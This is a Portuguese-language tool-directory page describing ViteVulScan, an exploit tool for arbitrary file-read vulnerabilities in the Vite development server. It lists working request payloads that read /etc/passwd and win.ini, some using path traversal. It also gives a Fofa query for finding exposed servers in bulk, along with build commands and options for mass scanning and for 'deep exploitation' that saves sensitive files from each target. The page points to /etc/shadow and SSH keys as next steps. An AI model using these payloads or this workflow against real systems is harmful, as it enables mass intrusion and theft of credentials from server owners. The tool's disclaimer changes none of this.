Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/jackieya/vitevulscan
ReconnaissanceVulnerability ScannersExploitationWeb Application ExploitationInformation GatheringFuzzing
GitHubjackieya/vitevulscan

ViteVulScan

针对CVE-2025-30208和CVE-2025-31125的漏洞利用

Ver Repositório
7há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
ViteVulScan — 针对CVE-2025-30208和CVE-2025-31125的漏洞利用 | Kitploit

ViteVulScan

Descrição das Vulnerabilidades

Este projeto envolve 3 vulnerabilidades: CVE-2025-30208 / CVE-2025-31125 / CVE-2025-31486, todas relacionadas a leitura arbitrária de arquivos no servidor de desenvolvimento Vite. Essas três vulnerabilidades têm ampla cobertura e são fáceis de explorar, sem restrições.

POC das Vulnerabilidades:

CVE-2025-30208:

Windows: /@fs/C://Windows/win.ini?import&raw??

Linux: /@fs/etc/passwd?import&raw??

CVE-2025-31125

Windows: /@fs/C://windows/win.ini?import&?inline=1.wasm?init

Linux: /@fs/etc/passwd?import&?inline=1.wasm?init

CVE-2025-31486

Windows: /@fs/x/x/x/vite-project/?/../../../../../C://windows/win.ini?import&?inline=1.wasm?init

Linux: /@fs/x/x/x/vite-project/?/../../../../../etc/passwd?import&?inline=1.wasm?init

O caminho /@fs pode ser omitido.

Sintaxe de pesquisa no Fofa:

body="/@vite/client"

Instruções de Uso da Ferramenta

Características da Ferramenta

  1. Pode ser integrada ao Fofa para exploração em lote.
  2. Analisa o caminho exato onde a vulnerabilidade existe e realiza exploração aprofundada.
  3. Aproveita ao máximo os recursos de concorrência do Go, permitindo a detecção rápida em lote de um grande número de ativos em pouco tempo.

Instruções de Compilação

Versão do Go: go 1.20 ou superior

Entre no diretório raiz do projeto

Primeiro, sincronize as dependências

go mod tidy

Em seguida, compile o projeto

go build -o ViteVulScan -ldflags="-s -w" -trimpath .

./ViteVulScan para executar o script.

Você também pode executar o projeto diretamente no diretório raiz:

go run .

Configuração

O script suporta a integração com o Fofa para buscar ativos e realizar detecção em lote.

Para usar o Fofa, certifique-se de que o arquivo app.ini esteja no mesmo diretório do binário compilado e modifique o arquivo app.ini no diretório config. Preencha o campo fofakey com sua chave do Fofa e num com a quantidade aproximada de ativos que deseja verificar.

Se você tiver uma sintaxe de pesquisa no Fofa melhor para essa vulnerabilidade, pode modificar o campo fofaQuery por conta própria.

Descrição dos Parâmetros de Linha de Comando

Usage of ./ViteVulScan:

Observações

  1. Para detectar em lote todas as URLs alvo em um arquivo, certifique-se de que cada linha do arquivo contenha uma URL. A URL pode ser uma URL completa com http, ou um domínio, ou IP, por exemplo:
    root@kitploit:~
      http://example1.com 
      example2.com
      127.0.0.1
    
  2. Quando os parâmetros -fofa e -f são especificados para detecção, os ativos vulneráveis são automaticamente salvos no diretório atual, com o formato de nome "timestamp_atual.csv".
  3. Suporta exploração tanto em plataformas Linux quanto Windows. Os dicionários utilizados são, respectivamente, linux_sensitive_path.txt e windows_sensitive_path.txt, localizados no diretório dict. Se houver mais caminhos sensíveis, você pode adicioná-los manualmente nos dicionários correspondentes.

Exemplos

Exemplo 1: Integração com Fofa para detecção em lote:

./ViteVulScan -fofa

image-20250410145741383

Após a varredura, no diretório result, você encontrará o arquivo CSV com as URLs que foram exploradas com sucesso, nomeado com o timestamp:

image-20250410151756704

Exemplo 2: Exploração aprofundada de uma URL vulnerável:

./ViteVulScan -u example.com -e

image-20250410150341952

Se aparecer "Exploração bem-sucedida", verifique o diretório result. Haverá um diretório com o nome da URL escaneada. Os conteúdos dos arquivos sensíveis escaneados são salvos no formato original do arquivo, no caminho correspondente, conforme mostrado abaixo:

image-20250410150836985

Tomando como exemplo o conteúdo salvo em result/localhost:5173/etc/passwd, vemos que o conteúdo completo da informação sensível foi preservado, facilitando a exploração subsequente (se for possível ler /etc/shadow ou as chaves SSH do servidor, é possível explorar ainda mais).

image-20250410151044619

Aviso de Isenção de Responsabilidade

Esta ferramenta destina-se apenas a pesquisas de segurança e testes autorizados. Não a utilize para fins ilegais. Qualquer consequência decorrente do uso desta ferramenta para testes não autorizados é de responsabilidade do usuário.

Atualizações

Lançamento inicial em 29 de março:

  • Implementação da funcionalidade de coleta de ativos via Fofa
  • Implementação da verificação em lote usando a vulnerabilidade CVE_2025_30208
  • Adição da funcionalidade de análise de linha de comando

1 de abril:

  • Implementação da funcionalidade de exploração aprofundada

2 de abril:

  • Adição da verificação da vulnerabilidade CVE_2025_31125, recém-publicada.

9 de abril:

  • Correção de erros no módulo Fofa.
  • Adição de funcionalidade de concorrência, suportando detecção rápida em lote para verificar se ativos possuem vulnerabilidades.
  • Adição da verificação para CVE_2025_31486.
  • Modificação da estrutura de arquivos do projeto.
Baixar ferramenta
ParâmetroDescrição
-cveQual vulnerabilidade CVE usar para detecção. Suporta CVE_2025_30208 / CVE_2025_31125 / CVE_2025_31486. O padrão é CVE_2025_30208.
-fofaSe especificado, integra-se ao Fofa para mapear ativos e realizar detecção em lote nos alvos obtidos.
-u | -urlEspecifica um único alvo URL para detecção.
-f | -filenameEspecifica um nome de arquivo para detecção em lote das URLs contidas nele.
-eSe especificado, realiza exploração aprofundada nos ativos que apresentarem vulnerabilidade, lendo diversos arquivos sensíveis possíveis e salvando-os localmente. (Use este recurso com cuidado; o ideal é usá-lo com detecção de um único alvo, ou seja, combinado com -u.)